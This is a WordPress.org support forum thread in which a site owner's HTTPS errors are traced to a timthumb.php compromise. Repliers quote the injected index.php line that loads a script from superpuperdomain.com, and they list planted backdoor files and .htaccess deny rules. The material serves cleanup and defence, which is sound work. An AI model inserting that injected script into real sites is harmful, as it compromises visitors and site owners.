WordPress.org

Support

Support » Plugins and Hacks » [Resolved] Two Strange Errors

[Resolved] Two Strange Errors

  • Hello,

    I am using Version 1.9.1 of your plugin.

    Things have worked great for a long time but recently things have gone haywire.

    I have two problems that I cannot seem to figure out.

    1. I am now forced to log into my WordPress admin via https. If log-in via http, I am redirected to the log in each and every time.

    2. For some reason, I started to get browser warnings that my https is not loading secure along with a broken https in the browers URL line. The culprit turned out to be http://superpuperdomain.com/count.php which apparently is WordPress core code (index.php). So I enabled, as suggested in this forum, External HTTPS Elements and Bypass External Check. That fixed the security errors. However, now in Internet Explorer 9, I get this warning, “Internet Explorer block this website from displaying content with security certificate errors.” The interesting thing is this appears on non-https pages – even before I reach a https page. This is a new error, and I am confident my security certificate is fine.

    Any suggestions?

    Thanks!
    Chris

Viewing 15 replies - 1 through 15 (of 34 total)
  • You have been hacked, your theme is the culprit

    http://wordpress.org/support/topic/rss-feed-crash?replies=6

    Dang. I think you are right. I checked my index.php against a freshly downloaded WordPress 3.2.1 and indeed it is not part of the core WordPress Code.

    In fact, I found the exact code identified in the link you sent:

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    echo'<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>'; ?>

    Now I need to figure out how to fix this.

    Thanks for your help.

    Chris

    Going to quote my post for y’all

    Hello,

    I have/had a similar problem, not with my rss though.

    You should read the following about superpuperdomain.com

    What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.

    Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

    I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.

    I scoured the Internet and finally found a fix.

    First, in your WordPress’s index.php, remove the following script added by the hack:

    echo ‘<script type=”text/javascript” language=”javascript” src=”http://superpuperdomain.com/count.php?ref=’.urlencode($_SERVER[‘HTTP_REFERER’]) .'”></script>’;

    Then remove three phony files added by the hackers (back up first, in case your installation actually requires these files):

    /wp-admin/js/config.php
    /wp-admin/common.php
    /wp-content/udp.php

    Do not try to open any of these files, as my antivirus sounded alarms immediately.

    I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

    To increase your site’s security, make sure you have correct permissions for files and directories.

    Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

    Run this bash command to set the correct permissions recursively for your WordPress installation:

    chmod -R 0755 /wordpressdirectory

    I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

    order allow,deny
    deny from 91.220
    allow from all

    The malicious script was run from superpuperdomain.com and I had run a traceroute on that domain, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220) and they would receive a forbidden notice if they tried to access TechSpheria again.

    Source: Techspheria

    PHPRemoteView Hack: What it is, and how to remove it

    Maybe it is a smart idea to check your WordPress installation for the files, ban the IP and update your timthumb.php…. Just in case 😉

    I guess we have to keep monitoring the website TechSperia, because yesterday they said there were two phony files, today there are three.

    Kind regards, OceansDB

    Plugin Author Mike Ems

    @mvied

    Sorry to hear you got hacked. Once the dust settles, let me know if you’re having any issue with my plugin.

    Also, not that I’ve tried any of them, but do you have any security plugins installed? I don’t really have any recommendations as I’ve never used them. I run my own server and tend to keep it on lockdown. I haven’t had any issues yet, other than some clever spam bots on one of my Buddypress sites.

    It is not your plugin. Timthumb.php has a security leak. The TS (topic starter) has to update his timthumb script.

    Plugin Author Mike Ems

    @mvied

    Yes, I know. I can read. Lol.

    Thanks everyone for the posts. I was indeed hacked because of the timthumb. It was used in my theme (elegant themes); The guys at BlogOnCloud9 are wonderful and responsive and already cleaned my website today. Everything is running fine again.

    However, Mvied, I can not figure this one out. I am forced to log-in https on my website. If I log-in http, the log-in fails, and it re-directs to this link: http://www.bmedpress.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.bmedpress.com%2Fwp-admin%2F

    Any suggestions?

    Chris

    Plugin Author Mike Ems

    @mvied

    Hey cfisher,

    I just released version 1.9.2 which has a fix for that issue. I actually ninja’d the fix into 1.9.1, but if you downloaded it before that, the bug would still occur. Update and let me know if that fixes it for you.

    Thanks,
    Mike

    Hi Mvied,

    That fixed it! Thanks for the prompt response and fix. Thanks to the community for their input too.

    All items have been resolved in this thread now.

    Thanks!
    Chris

    Thanks for the fix and the suggestions! I found all the files in question.

    Okay, going to copy paste a few details here. The site you are giving Ipstenu is great, but doesn’t inform about the phony files superpuperdomain places in your wordpress installation.

    Please do not forget to delete these files!

    /wp-admin/js/config.php
    /wp-admin/common.php
    /wp-admin/udp.php
    /wp-content/udp.php
    /wp-content/uploads/feed-file.php
    /wp-content/uploads/feed-files.php

    Don’t forget to make a .htaccess file outside your public_html with these lines:

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain.com
    deny from superpuperdomain2.com
    allow from all

    Thank you 🙂

    Apart from these files, also found:

    / wp-content/e334….php
    / wp-config.php
    / index.php

    Who had injected code.

    Lauro Faria
    http://www.bdibbs.com.br

    ok. so how do we make this update to TimThumb ?

    i deleted those files last week , all was fine, but now it seems i can see any pictures in my websites , that are with external content

    in ftp i see that timthumb.php was modified yesterday !

    Check the version of Timthumb.php.
    Here, it was version 2.4, but adulterated.
    The latest version is 2.7, but compare the official version.
    http://timthumb.googlecode.com/svn/trunk/timthumb.php
    Stay tuned.

Viewing 15 replies - 1 through 15 (of 34 total)
  • The topic ‘[Resolved] Two Strange Errors’ is closed to new replies.